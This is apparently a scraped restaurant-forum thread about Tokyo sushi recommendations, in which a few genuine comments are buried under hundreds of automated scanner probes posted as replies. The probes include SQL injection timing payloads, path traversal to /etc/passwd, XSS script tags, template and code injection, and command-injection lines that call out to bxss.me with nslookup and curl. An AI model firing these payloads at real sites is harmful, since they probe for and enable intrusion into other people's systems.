.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: magiquonnu
WEB-INF/web.xml
re: magiquonnu
WEB-INF\web.xml
re: magiquonnu
1
re: magiquonnu
1
re: magiquonnu
-1 OR 2+275-275-1=0+0+0+1 --
re: magiquonnu
-1 OR 3+275-275-1=0+0+0+1 --
re: magiquonnu
-1 OR 2+260-260-1=0+0+0+1
re: magiquonnu
-1 OR 3+260-260-1=0+0+0+1
re: magiquonnu
-1' OR 2+487-487-1=0+0+0+1 --
re: magiquonnu
-1' OR 3+487-487-1=0+0+0+1 --
re: magiquonnu
-1' OR 2+144-144-1=0+0+0+1 or 'JLlZdwPQ'='
re: magiquonnu
-1' OR 3+144-144-1=0+0+0+1 or 'JLlZdwPQ'='
re: magiquonnu
-1" OR 2+571-571-1=0+0+0+1 --
re: magiquonnu
-1" OR 3+571-571-1=0+0+0+1 --
re: magiquonnu
if(now()=sysdate(),sleep(15),0)
re: magiquonnu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: magiquonnu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: magiquonnu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: magiquonnu
-1; waitfor delay '0:0:15' --
re: magiquonnu
-1); waitfor delay '0:0:15' --
re: magiquonnu
1 waitfor delay '0:0:15' --
re: magiquonnu
Z6No7M6X'; waitfor delay '0:0:15' --
re: magiquonnu
-5 OR 185=(SELECT 185 FROM PG_SLEEP(15))--
re: magiquonnu
-5) OR 212=(SELECT 212 FROM PG_SLEEP(15))--
re: magiquonnu
-1)) OR 132=(SELECT 132 FROM PG_SLEEP(15))--
re: magiquonnu
OV1OeYCR' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: magiquonnu
QtpfF6as') OR 327=(SELECT 327 FROM PG_SLEEP(15))--
re: magiquonnu
w6SHbpwo')) OR 404=(SELECT 404 FROM PG_SLEEP(15))--
re: magiquonnu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: magiquonnu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: magiquonnu
'||(select 1 from (select pg_sleep(15))x)||'
re: magiquonnu
''||(select 1 from (select pg_sleep(15))x)||''
re: magiquonnu
1'"
re: magiquonnu
@@wyywj
re: magiquonnu
1SLGSV3B30
re: magiquonnu
response.write(9040405*9870180)
re: magiquonnu
'+response.write(9040405*9870180)+'
re: magiquonnu
"+response.write(9040405*9870180)+"
re: magiquonnu
../../../../../../../../../../../../../../etc/passwd
re: magiquonnu
../../../../../../../../../../../../../../windows/win.ini
re: magiquonnu
file:///etc/passwd
re: magiquonnu
<esi:include src="http://bxss.me/rpb.png"/>
re: magiquonnu
${10000433+9999891}
re: magiquonnu
../
re: magiquonnu
)
re: magiquonnu
redirtest.acx
re: magiquonnu
!(()&&!|*|*|
re: magiquonnu
^(#$!@#$)(()))******
re: magiquonnu
echo plefwt$()\ xebusm\nz^xyu||a #' &echo plefwt$()\ xebusm\nz^xyu||a #|" &echo plefwt$()\ xebusm\nz^xyu||a #
re: magiquonnu
&echo mhzste$()\ hwschj\nz^xyu||a #' &echo mhzste$()\ hwschj\nz^xyu||a #|" &echo mhzste$()\ hwschj\nz^xyu||a #
re: magiquonnu
|echo buaonr$()\ xisqdm\nz^xyu||a #' |echo buaonr$()\ xisqdm\nz^xyu||a #|" |echo buaonr$()\ xisqdm\nz^xyu||a #
re: magiquonnu
'.gethostbyname(lc('hitte'.'omxwbshbeed76.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(83).chr(99).chr(83).'
re: magiquonnu
ctime
sleep
p0
(I30
tp1
Rp2
.
re: magiquonnu
expr 9000565900 - 928934
re: magiquonnu
".gethostbyname(lc("hitke"."pbippyho9c1de.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(83).chr(98).chr(66)."
re: magiquonnu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: magiquonnu
(nslookup -q=cname hitekhrwcthlm3a09d.bxss.me||curl hitekhrwcthlm3a09d.bxss.me))
re: magiquonnu
gethostbyname(lc('hitmh'.'txtkjccw925ed.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(67).chr(122).chr(89)
re: magiquonnu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: magiquonnu
$(nslookup -q=cname hitzwspepodbq64519.bxss.me||curl hitzwspepodbq64519.bxss.me)
re: magiquonnu
/etc/shells
re: magiquonnu
&nslookup -q=cname hitlifqfpcgnq53b5b.bxss.me&'\"`0&nslookup -q=cname hitlifqfpcgnq53b5b.bxss.me&`'
re: magiquonnu
../../../../../../../../../../../../../../etc/shells
re: magiquonnu
&(nslookup -q=cname hitvcccaeywor9d63c.bxss.me||curl hitvcccaeywor9d63c.bxss.me)&'\"`0&(nslookup -q=cname hitvcccaeywor9d63c.bxss.me||curl hitvcccaeywor9d63c.bxss.me)&`'
re: magiquonnu
c:/windows/win.ini
re: magiquonnu
|(nslookup -q=cname hitgprgkanlkj1f7ff.bxss.me||curl hitgprgkanlkj1f7ff.bxss.me)
re: magiquonnu
bxss.me
re: magiquonnu
`(nslookup -q=cname hitgywcsonvgu07790.bxss.me||curl hitgywcsonvgu07790.bxss.me)`
re: magiquonnu
Http://bxss.me/t/fit.txt
re: magiquonnu
;(nslookup -q=cname hitaedvnkcqlz3dfd6.bxss.me||curl hitaedvnkcqlz3dfd6.bxss.me)|(nslookup -q=cname hitaedvnkcqlz3dfd6.bxss.me||curl hitaedvnkcqlz3dfd6.bxss.me)&(nslookup -q=cname hitaedvnkcqlz3dfd6.bxss.me||curl hitaedvnkcqlz3dfd6.bxss.me)
re: magiquonnu
http://bxss.me/t/fit.txt?.jpg
re: magiquonnu
|(nslookup${IFS}-q${IFS}cname${IFS}hitbabdmewwvse90f7.bxss.me||curl${IFS}hitbabdmewwvse90f7.bxss.me)
re: magiquonnu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: magiquonnu
HttP://bxss.me/t/xss.html?%00
re: magiquonnu
&(nslookup${IFS}-q${IFS}cname${IFS}hitemnpjqztpy46175.bxss.me||curl${IFS}hitemnpjqztpy46175.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitemnpjqztpy46175.bxss.me||curl${IFS}hitemnpjqztpy46175.bxss.me)&`'
re: magiquonnu
';print(md5(31337));$a='
re: magiquonnu
bxss.me/t/xss.html?%00
re: magiquonnu
";print(md5(31337));$a="
re: magiquonnu
${@print(md5(31337))}
re: magiquonnu
${@print(md5(31337))}\
re: magiquonnu
'.print(md5(31337)).'
re: magiquonnu
'"()
re: magiquonnu
"+"A".concat(70-3).concat(22*4).concat(110).concat(86).concat(112).concat(78)+(require"socket"
Socket.gethostbyname("hitlo"+"xmthkmxq68082.bxss.me.")[3].to_s)+"
re: magiquonnu
'&&sleep(27*1000)*grvzfx&&'
re: magiquonnu
'+'A'.concat(70-3).concat(22*4).concat(108).concat(83).concat(122).concat(72)+(require'socket'
Socket.gethostbyname('hitmv'+'nholqdgdd5b07.bxss.me.')[3].to_s)+'
re: magiquonnu
"&&sleep(27*1000)*vlaugz&&"
re: magiquonnu
'A'.concat(70-3).concat(22*4).concat(110).concat(77).concat(116).concat(87)+(require'socket'
Socket.gethostbyname('hitiw'+'vknlnmgx77a6b.bxss.me.')[3].to_s)
re: magiquonnu
'||sleep(27*1000)*ejrfqc||'
re: magiquonnu
"||sleep(27*1000)*oskvma||"
re: magiquonnu
replies
re: magiquonnu
replies�
re: magiquonnu
'"
re: magiquonnu
replies/.
re: magiquonnu
<!--
re: magiquonnu
'"()&%<zzz><ScRiPt >a56s(9882)</ScRiPt>
re: magiquonnu
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxxfiqoigps0d2aa.bxss.me")}}
re: magiquonnu
'"()&%<zzz><ScRiPt >a56s(9713)</ScRiPt>
re: magiquonnu
9951477
re: magiquonnu
FqEvTYrj
re: magiquonnu
*1
re: magiquonnu
*1
re: magiquonnu
*1
re: magiquonnu
*1
re: magiquonnu
-1 OR 5*5=25 --
re: magiquonnu
-1 OR 5*5=26 --
re: magiquonnu
-1 OR 5*5=25
re: magiquonnu
-1 OR 5*5=26
re: magiquonnu
*if(now()=sysdate(),sleep(15),0)
re: magiquonnu
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: magiquonnu
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: magiquonnu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: magiquonnu
-1; waitfor delay '0:0:15' --
re: magiquonnu
-1); waitfor delay '0:0:15' --
re: magiquonnu
-1 waitfor delay '0:0:15' --
re: magiquonnu
IV6m7k2Z'; waitfor delay '0:0:15' --
re: magiquonnu
-1 OR 85=(SELECT 85 FROM PG_SLEEP(15))--
re: magiquonnu
-1) OR 792=(SELECT 792 FROM PG_SLEEP(15))--
re: magiquonnu
-1)) OR 371=(SELECT 371 FROM PG_SLEEP(15))--
re: magiquonnu
uylcQxtG' OR 256=(SELECT 256 FROM PG_SLEEP(15))--
re: magiquonnu
ufY6a3yM') OR 113=(SELECT 113 FROM PG_SLEEP(15))--
re: magiquonnu
JJBf22hE')) OR 929=(SELECT 929 FROM PG_SLEEP(15))--
re: magiquonnu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: magiquonnu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: magiquonnu
'||(select 1 from (select pg_sleep(15))x)||'
re: magiquonnu
''||(select 1 from (select pg_sleep(15))x)||''
re: magiquonnu
'"
re: magiquonnu
@@KQkM1
re: magiquonnu
(select 198766*667891)
re: magiquonnu
(select 198766*667891 from DUAL)
Thanks for sharing. Agree with Suzuki and Owana and Tsukiuda is good too but definitely do not recommend Udatsu and Kizaki. Don't think the others are notable.
re: thetokyogourmet
1YHGDE9YN0
re: thetokyogourmet
response.write(9490881*9435515)
re: thetokyogourmet
'+response.write(9490881*9435515)+'
re: thetokyogourmet
"+response.write(9490881*9435515)+"
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
${10000045+9999667}
re: thetokyogourmet
../
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
)
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
echo dfsfqg$()\ vkejle\nz^xyu||a #' &echo dfsfqg$()\ vkejle\nz^xyu||a #|" &echo dfsfqg$()\ vkejle\nz^xyu||a #
re: thetokyogourmet
'.gethostbyname(lc('hitvg'.'qlrdprbx7f86c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(65).chr(103).chr(72).'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: thetokyogourmet
&echo hlvkdy$()\ lweclc\nz^xyu||a #' &echo hlvkdy$()\ lweclc\nz^xyu||a #|" &echo hlvkdy$()\ lweclc\nz^xyu||a #
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
".gethostbyname(lc("hithc"."wreehghmc5cc3.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(88).chr(107).chr(71)."
re: thetokyogourmet
|echo kpwapa$()\ klmjqn\nz^xyu||a #' |echo kpwapa$()\ klmjqn\nz^xyu||a #|" |echo kpwapa$()\ klmjqn\nz^xyu||a #
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
gethostbyname(lc('hitud'.'npxqokeyd0a26.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(82).chr(106).chr(88)
re: thetokyogourmet
expr 9000251466 - 943476
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
(nslookup -q=cname hitkyhynvatme008ab.bxss.me||curl hitkyhynvatme008ab.bxss.me))
re: thetokyogourmet
bxss.me
re: thetokyogourmet
$(nslookup -q=cname hitrfhorrtqxx20887.bxss.me||curl hitrfhorrtqxx20887.bxss.me)
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
&nslookup -q=cname hitgpemijyrnq68246.bxss.me&'\"`0&nslookup -q=cname hitgpemijyrnq68246.bxss.me&`'
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
&(nslookup -q=cname hitunaaigmdtn9a3fa.bxss.me||curl hitunaaigmdtn9a3fa.bxss.me)&'\"`0&(nslookup -q=cname hitunaaigmdtn9a3fa.bxss.me||curl hitunaaigmdtn9a3fa.bxss.me)&`'
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
|(nslookup -q=cname hitzdhxsaursu5f758.bxss.me||curl hitzdhxsaursu5f758.bxss.me)
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
`(nslookup -q=cname hitxtmldntetc82c3c.bxss.me||curl hitxtmldntetc82c3c.bxss.me)`
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
;(nslookup -q=cname hitljquhattfa3317c.bxss.me||curl hitljquhattfa3317c.bxss.me)|(nslookup -q=cname hitljquhattfa3317c.bxss.me||curl hitljquhattfa3317c.bxss.me)&(nslookup -q=cname hitljquhattfa3317c.bxss.me||curl hitljquhattfa3317c.bxss.me)
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitrnidkplgcm3bc1d.bxss.me||curl${IFS}hitrnidkplgcm3bc1d.bxss.me)
re: thetokyogourmet
'"()
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hitbqvfjeodqz9a305.bxss.me||curl${IFS}hitbqvfjeodqz9a305.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbqvfjeodqz9a305.bxss.me||curl${IFS}hitbqvfjeodqz9a305.bxss.me)&`'
re: thetokyogourmet
'&&sleep(27*1000)*jsdrgl&&'
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(113).concat(67).concat(100).concat(68)+(require"socket"
Socket.gethostbyname("hittv"+"mzfjokardd902.bxss.me.")[3].to_s)+"
re: thetokyogourmet
"&&sleep(27*1000)*wurcno&&"
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(100).concat(85).concat(121).concat(76)+(require'socket'
Socket.gethostbyname('hitzb'+'nkmhakqo210d0.bxss.me.')[3].to_s)+'
re: thetokyogourmet
'||sleep(27*1000)*vynmao||'
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(115).concat(70).concat(122).concat(73)+(require'socket'
Socket.gethostbyname('hitdz'+'kqmxafgsb7761.bxss.me.')[3].to_s)
re: thetokyogourmet
"||sleep(27*1000)*bzgpwv||"
re: thetokyogourmet
'"
re: thetokyogourmet
replies
re: thetokyogourmet
<!--
re: thetokyogourmet
replies�
re: thetokyogourmet
replies/.
re: thetokyogourmet
'"()&%<zzz><ScRiPt >o5l1(9185)</ScRiPt>
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitkxdintrell7fe05.bxss.me")}}
re: thetokyogourmet
'"()&%<zzz><ScRiPt >o5l1(9254)</ScRiPt>
re: thetokyogourmet
9895154
re: thetokyogourmet
TorgJaSE
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
2EoAM42a'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 979=(SELECT 979 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 673=(SELECT 673 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 907=(SELECT 907 FROM PG_SLEEP(15))--
re: thetokyogourmet
wpye9McJ' OR 830=(SELECT 830 FROM PG_SLEEP(15))--
re: thetokyogourmet
xuFa5kBR') OR 435=(SELECT 435 FROM PG_SLEEP(15))--
re: thetokyogourmet
YRATWmOb')) OR 232=(SELECT 232 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@gxi0z
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
https://www.luxeat.com/blog/20-possible-to-book-sushi-yas-in-tokyo/ dropped a couple of weeks ago. Not a lot of difference from the 2023 list.
re: guest
17ZQDQKG90
re: guest
response.write(9134016*9632360)
re: guest
'+response.write(9134016*9632360)+'
re: guest
"+response.write(9134016*9632360)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
file:///etc/passwd
re: guest
${10000320+10000337}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
echo ishhmq$()\ ybjhtg\nz^xyu||a #' &echo ishhmq$()\ ybjhtg\nz^xyu||a #|" &echo ishhmq$()\ ybjhtg\nz^xyu||a #
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
&echo bhkhpf$()\ fuispt\nz^xyu||a #' &echo bhkhpf$()\ fuispt\nz^xyu||a #|" &echo bhkhpf$()\ fuispt\nz^xyu||a #
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
'.gethostbyname(lc('hitwr'.'zrnlzbhv683f6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(88).chr(103).chr(76).'
re: guest
|echo silnfa$()\ baiyrn\nz^xyu||a #' |echo silnfa$()\ baiyrn\nz^xyu||a #|" |echo silnfa$()\ baiyrn\nz^xyu||a #
re: guest
/etc/shells
re: guest
".gethostbyname(lc("hittq"."mplrwthu670cf.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(84).chr(102).chr(90)."
re: guest
expr 9000270066 - 913796
re: guest
gethostbyname(lc('hitbv'.'fpilmnxib7f82.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(87).chr(115).chr(87)
re: guest
../../../../../../../../../../../../../../etc/shells
re: guest
(nslookup -q=cname hitwxoejdduadfec2c.bxss.me||curl hitwxoejdduadfec2c.bxss.me))
re: guest
c:/windows/win.ini
re: guest
$(nslookup -q=cname hitwojvgqgvfua237c.bxss.me||curl hitwojvgqgvfua237c.bxss.me)
re: guest
bxss.me
re: guest
&nslookup -q=cname hitlfsgijljmnf1c66.bxss.me&'\"`0&nslookup -q=cname hitlfsgijljmnf1c66.bxss.me&`'
re: guest
Http://bxss.me/t/fit.txt
re: guest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: guest
&(nslookup -q=cname hithggaqvhbxz0dfba.bxss.me||curl hithggaqvhbxz0dfba.bxss.me)&'\"`0&(nslookup -q=cname hithggaqvhbxz0dfba.bxss.me||curl hithggaqvhbxz0dfba.bxss.me)&`'
re: guest
http://bxss.me/t/fit.txt?.jpg
re: guest
|(nslookup -q=cname hitijzjmuoxqi97759.bxss.me||curl hitijzjmuoxqi97759.bxss.me)
re: guest
`(nslookup -q=cname hityfuhuoveuv90714.bxss.me||curl hityfuhuoveuv90714.bxss.me)`
re: guest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: guest
;(nslookup -q=cname hitmtcbkpnete72f4a.bxss.me||curl hitmtcbkpnete72f4a.bxss.me)|(nslookup -q=cname hitmtcbkpnete72f4a.bxss.me||curl hitmtcbkpnete72f4a.bxss.me)&(nslookup -q=cname hitmtcbkpnete72f4a.bxss.me||curl hitmtcbkpnete72f4a.bxss.me)
re: guest
';print(md5(31337));$a='
re: guest
|(nslookup${IFS}-q${IFS}cname${IFS}hitlvxllymqzq676ef.bxss.me||curl${IFS}hitlvxllymqzq676ef.bxss.me)
re: guest
'"()
re: guest
";print(md5(31337));$a="
re: guest
&(nslookup${IFS}-q${IFS}cname${IFS}hitwzuuzdbxvz94c6b.bxss.me||curl${IFS}hitwzuuzdbxvz94c6b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwzuuzdbxvz94c6b.bxss.me||curl${IFS}hitwzuuzdbxvz94c6b.bxss.me)&`'
re: guest
'&&sleep(27*1000)*qnugei&&'
re: guest
${@print(md5(31337))}
re: guest
"&&sleep(27*1000)*dycjwz&&"
re: guest
${@print(md5(31337))}\
re: guest
'||sleep(27*1000)*snigje||'
re: guest
HttP://bxss.me/t/xss.html?%00
re: guest
'.print(md5(31337)).'
re: guest
"||sleep(27*1000)*cgfovu||"
re: guest
bxss.me/t/xss.html?%00
re: guest
"+"A".concat(70-3).concat(22*4).concat(115).concat(78).concat(119).concat(65)+(require"socket"
Socket.gethostbyname("hitlo"+"cvvhqyeuc300e.bxss.me.")[3].to_s)+"
re: guest
'+'A'.concat(70-3).concat(22*4).concat(106).concat(75).concat(109).concat(79)+(require'socket'
Socket.gethostbyname('hitax'+'jvozlyhs8c4ef.bxss.me.')[3].to_s)+'
re: guest
'A'.concat(70-3).concat(22*4).concat(112).concat(86).concat(120).concat(70)+(require'socket'
Socket.gethostbyname('hitem'+'vyzfauat53cf6.bxss.me.')[3].to_s)
re: guest
replies
re: guest
'"
re: guest
replies�
re: guest
<!--
re: guest
replies/.
re: guest
'"()&%<zzz><ScRiPt >k0rQ(9489)</ScRiPt>
re: guest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitzyrraedgtm623c3.bxss.me")}}
re: guest
'"()&%<zzz><ScRiPt >k0rQ(9941)</ScRiPt>
re: guest
9971675
re: guest
jExJNEQ5
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
*1
re: guest
-1 OR 5*5=25 --
re: guest
-1 OR 5*5=26 --
re: guest
-1 OR 5*5=25
re: guest
-1 OR 5*5=26
re: guest
*if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
-1 waitfor delay '0:0:15' --
re: guest
6h04RpCT'; waitfor delay '0:0:15' --
re: guest
-1 OR 958=(SELECT 958 FROM PG_SLEEP(15))--
re: guest
-1) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
re: guest
-1)) OR 957=(SELECT 957 FROM PG_SLEEP(15))--
re: guest
YdrV8aOK' OR 670=(SELECT 670 FROM PG_SLEEP(15))--
re: guest
gNwbbxR3') OR 627=(SELECT 627 FROM PG_SLEEP(15))--
re: guest
Dxo7F7yp')) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
'"
re: guest
@@YhROn
re: guest
(select 198766*667891)
re: guest
(select 198766*667891 from DUAL)
Thanks guest. Sushi mitaka looks interesting.
re: guest
1P43IVAD60
re: guest
response.write(9469500*9270480)
re: guest
'+response.write(9469500*9270480)+'
re: guest
"+response.write(9469500*9270480)+"
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
${10000005+9999023}
re: guest
../
re: guest
)
re: guest
!(()&&!|*|*|
re: guest
redirtest.acx
re: guest
^(#$!@#$)(()))******
re: guest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: guest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: guest
echo vexjgr$()\ mbwehc\nz^xyu||a #' &echo vexjgr$()\ mbwehc\nz^xyu||a #|" &echo vexjgr$()\ mbwehc\nz^xyu||a #
re: guest
'.gethostbyname(lc('hitxk'.'mbtmgphg9e81f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(67).chr(98).chr(72).'
re: guest
/etc/shells
re: guest
&echo wbxlzs$()\ gaslgh\nz^xyu||a #' &echo wbxlzs$()\ gaslgh\nz^xyu||a #|" &echo wbxlzs$()\ gaslgh\nz^xyu||a #
re: guest
